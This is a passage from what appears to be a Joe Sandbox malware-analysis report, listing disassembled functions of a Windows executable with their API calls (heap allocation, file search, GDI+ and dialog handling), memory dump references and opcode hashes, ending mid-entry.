                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: 410dbec79faabd1a0f414e9478a032a1aa19dd8ae9f8370fa80c4ea85c2803fa
                                                                          • Instruction ID: e5f6a5ef602da7205bd6a5cdd41bb39ecd1694a4f338b7b9a39540bf4aee17a2
                                                                          • Opcode Fuzzy Hash: 410dbec79faabd1a0f414e9478a032a1aa19dd8ae9f8370fa80c4ea85c2803fa
                                                                          • Instruction Fuzzy Hash: 40016533D00568ABCF26AFA8CD819DEB735BF88750F014515E816B7192DA788D14F6A0
                                                                          Function 00F2C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F2B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F29813,00000001,00000364,?,00F23F73,00000050,?,00F41030,00000200), ref: 00F2B177
                                                                          • _free.LIBCMT ref: 00F2C4E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free
                                                                          • String ID:
                                                                          • API String ID: 614378929-0
                                                                          • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                          • Instruction ID: 5f45342e9e68eba12af70370066bb084083af25027cb595b3681a3c0615481cf
                                                                          • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                          • Instruction Fuzzy Hash: C70126726003156BE331DE65EC81A6AFBE8EB89370F65091DE58483281EA30A905C764
                                                                          Function 00F2B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F29813,00000001,00000364,?,00F23F73,00000050,?,00F41030,00000200), ref: 00F2B177
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: dd59ebd111ec4e6b1d5571c7a8de1b8be01d77b2207146af2b10b1f7e6224c3a
                                                                          • Instruction ID: 795a87be13def2204a1cc31b1ccbcc5addc54e989b179dc5cd1d0a5dd4da533a
                                                                          • Opcode Fuzzy Hash: dd59ebd111ec4e6b1d5571c7a8de1b8be01d77b2207146af2b10b1f7e6224c3a
                                                                          • Instruction Fuzzy Hash: 27F0893294953577EB615B22BC15B5F7758AF41770B18C111FC18DB190CB74DD21B6E0
                                                                          Function 00F23C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00F23C3F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID:
                                                                          • API String ID: 190572456-0
                                                                          • Opcode ID: d2762230f5f1ccc7a43339168a4bf133d6c829278d91810dbf2d65de597f7a68
                                                                          • Instruction ID: 33bbdb7df84649ecd643b7b689daf3792c27c190195e6db5e1fd59f50057424d
                                                                          • Opcode Fuzzy Hash: d2762230f5f1ccc7a43339168a4bf133d6c829278d91810dbf2d65de597f7a68
                                                                          • Instruction Fuzzy Hash: 7EF0A07264022A9F8F158EA8FC00A9A77E9EF41B347104124FA15E71A0DB35EA20E790
                                                                          Function 00F28E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2CA2C,00000000,?,00F26CBE,?,00000008,?,00F291E0,?,?,?), ref: 00F28E38
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: c2f1a6e9919b09123156c2a0b45fb0106430312c91500da31291b14c21d4923b
                                                                          • Instruction ID: 2e9055b90ca8adf1326b054fef577a5b96662603e6185fc2480acf17823a673d
                                                                          • Opcode Fuzzy Hash: c2f1a6e9919b09123156c2a0b45fb0106430312c91500da31291b14c21d4923b
                                                                          • Instruction Fuzzy Hash: 4DE06531A07A3657D67126A5BC05B9B76489F417F4F174111AC5897091CF69CC02B2E1
                                                                          Function 00F05ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F05AC2
                                                                            • Part of subcall function 00F0B505: __EH_prolog.LIBCMT ref: 00F0B50A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: 091b57791a119eea04614b2dc83142fe9755bdac0139e34918e6f6c3308c14f7
                                                                          • Instruction ID: 6aa23654b27996625025ee95d8eff6eb70f2d615ab69a4c6b70580e28c737db4
                                                                          • Opcode Fuzzy Hash: 091b57791a119eea04614b2dc83142fe9755bdac0139e34918e6f6c3308c14f7
                                                                          • Instruction Fuzzy Hash: 5B018C30810690DAD725E7B8C8417EDFBA4AF64304F54848DA45A53282CFFC1B48F7A2
                                                                          Function 00F0A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F0A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A6C4
                                                                            • Part of subcall function 00F0A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A6F2
                                                                            • Part of subcall function 00F0A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A6FE
                                                                          • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00F0A598
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Find$FileFirst$CloseErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1464966427-0
                                                                          • Opcode ID: 182a33d317dab4ec21fa3c1cb926b2cc42738fd01bf62204adfeeae02cac7c9a
                                                                          • Instruction ID: 411a7ad1b7dd60a17123fcb72b638790b814b30dcb4bca522346b52590d6431f
                                                                          • Opcode Fuzzy Hash: 182a33d317dab4ec21fa3c1cb926b2cc42738fd01bf62204adfeeae02cac7c9a
                                                                          • Instruction Fuzzy Hash: D5F08232409790AFCB2257B48D05BDBBBA06F1A331F088A49F5FD521D6C3795094BB23
                                                                          Function 00F10E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetThreadExecutionState.KERNEL32(00000001), ref: 00F10E3D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ExecutionStateThread
                                                                          • String ID:
                                                                          • API String ID: 2211380416-0
                                                                          • Opcode ID: 82adb666d3d07a2149e7d52defd8c4116a03e322315834da6be805281e64f015
                                                                          • Instruction ID: f292a1aad45f568e1c3f8b805f829ad71b39601edeea5ae0c9ec0add68332459
                                                                          • Opcode Fuzzy Hash: 82adb666d3d07a2149e7d52defd8c4116a03e322315834da6be805281e64f015
                                                                          • Instruction Fuzzy Hash: 7CD02B01A0506856EF21732D6D15BFE39069FD7321F0C0025F5459B1C3CE8C08C2B361
                                                                          Function 00F1A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GdipAlloc.GDIPLUS(00000010), ref: 00F1A62C
                                                                            • Part of subcall function 00F1A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F1A3DA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Gdip$AllocBitmapCreateFromStream
                                                                          • String ID:
                                                                          • API String ID: 1915507550-0
                                                                          • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                          • Instruction ID: 96f584f829329bc84987a129e74bd319930fcdeccb8acb879609bca48fd26d52
                                                                          • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                          • Instruction Fuzzy Hash: 79D0A931201208BADF02AB218C02AEE7AA9EB10340F008021BC82C5181EAB6D990B262
                                                                          Function 00F1E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DloadProtectSection.DELAYIMP ref: 00F1E5E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: DloadProtectSection
                                                                          • String ID:
                                                                          • API String ID: 2203082970-0
                                                                          • Opcode ID: 537eec4afbb04bee8f40fc4d8235f1ddffa9923edc0b498f034e68d02d58f8c2
                                                                          • Instruction ID: 4a9f82b2ef6ac5e633147f488ef6d6f05496f19681249cf196f73fa3aad244f1
                                                                          • Opcode Fuzzy Hash: 537eec4afbb04bee8f40fc4d8235f1ddffa9923edc0b498f034e68d02d58f8c2
                                                                          • Instruction Fuzzy Hash: EAD012B05C02449BD701EBA89D46FDE77A6B324B24FDC0501F995E1491DBA884C0FA06
                                                                          Function 00F1DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00F11B3E), ref: 00F1DD92
                                                                            • Part of subcall function 00F1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1B579
                                                                            • Part of subcall function 00F1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1B58A
                                                                            • Part of subcall function 00F1B568: IsDialogMessageW.USER32(0001045C,?), ref: 00F1B59E
                                                                            • Part of subcall function 00F1B568: TranslateMessage.USER32(?), ref: 00F1B5AC
                                                                            • Part of subcall function 00F1B568: DispatchMessageW.USER32(?), ref: 00F1B5B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                          • String ID:
                                                                          • API String ID: 897784432-0
                                                                          • Opcode ID: 9af07e6315789b27964a1245c0fa08885544ad4a20c202783c0f99995b03c269
                                                                          • Instruction ID: b7dd06f4350d84eebf8d9d66e2249a1da8e884f5687d36d5e8a1c54fc53cbdf2
                                                                          • Opcode Fuzzy Hash: 9af07e6315789b27964a1245c0fa08885544ad4a20c202783c0f99995b03c269
                                                                          • Instruction Fuzzy Hash: 36D09E71144300BAD6016B51CD06F0E7AA2AB99B04F004954B784740B18AB29D61FB11
                                                                          Function 00F098BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileType.KERNELBASE(000000FF,00F097BE), ref: 00F098C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID:
                                                                          • API String ID: 3081899298-0
                                                                          • Opcode ID: d94d250134d10b14d9c115974763904994a59503a81759f4245a28ec65c5e830
                                                                          • Instruction ID: 9334ba6195aacffadf9133b6569f61a21919f0a0e94bf9369fd3f3ec9bf26b8b
                                                                          • Opcode Fuzzy Hash: d94d250134d10b14d9c115974763904994a59503a81759f4245a28ec65c5e830
                                                                          • Instruction Fuzzy Hash: F8C0127480810585CE20862498440957352AA533757F4D694D028851E2D372CC47FA00
                                                                          Function 00F1E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: f5ae3cca1a5b030db3840c0fc4c99c258b380a08b7640a8eee1fcc2fbfb89ba1
                                                                          • Instruction ID: 5a255a5c9b71aaba1fd6dad54fc0e77b355d22238196cd4d5403e78c0857634d
                                                                          • Opcode Fuzzy Hash: f5ae3cca1a5b030db3840c0fc4c99c258b380a08b7640a8eee1fcc2fbfb89ba1
                                                                          • Instruction Fuzzy Hash: 8EB012D2658000BC314456151D06DB7110CD6C2B30330C03EFC06D0281D840EC853972
                                                                          Function 00F1E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: cf4ee46756f5fb199598b3f1266e4fd58151008f07f296475f1d99ea5d4bb839
                                                                          • Instruction ID: 66489fffd27c78e2fdfcff252d678efa98f5b0a9fadd3f9bd78741318f3ccf37
                                                                          • Opcode Fuzzy Hash: cf4ee46756f5fb199598b3f1266e4fd58151008f07f296475f1d99ea5d4bb839
                                                                          • Instruction Fuzzy Hash: AFB012D625C100BC314451591D06DB7110CE6C2B30330403EFC06D0181D840AC813A72
                                                                          Function 00F1E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 321b3a9df00415db73334375dadb5d873ed3135be678574e9320ef4994ff9de8
                                                                          • Instruction ID: 72b40937082b1d9fdc00002197e1b56a24b128388fc93f7338748c94458e9057
                                                                          • Opcode Fuzzy Hash: 321b3a9df00415db73334375dadb5d873ed3135be678574e9320ef4994ff9de8
                                                                          • Instruction Fuzzy Hash: 0CB012D6658100BC310411551D06CB7110CD6C3B30330843EFC02E0481D840EC813872
                                                                          Function 00F1E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
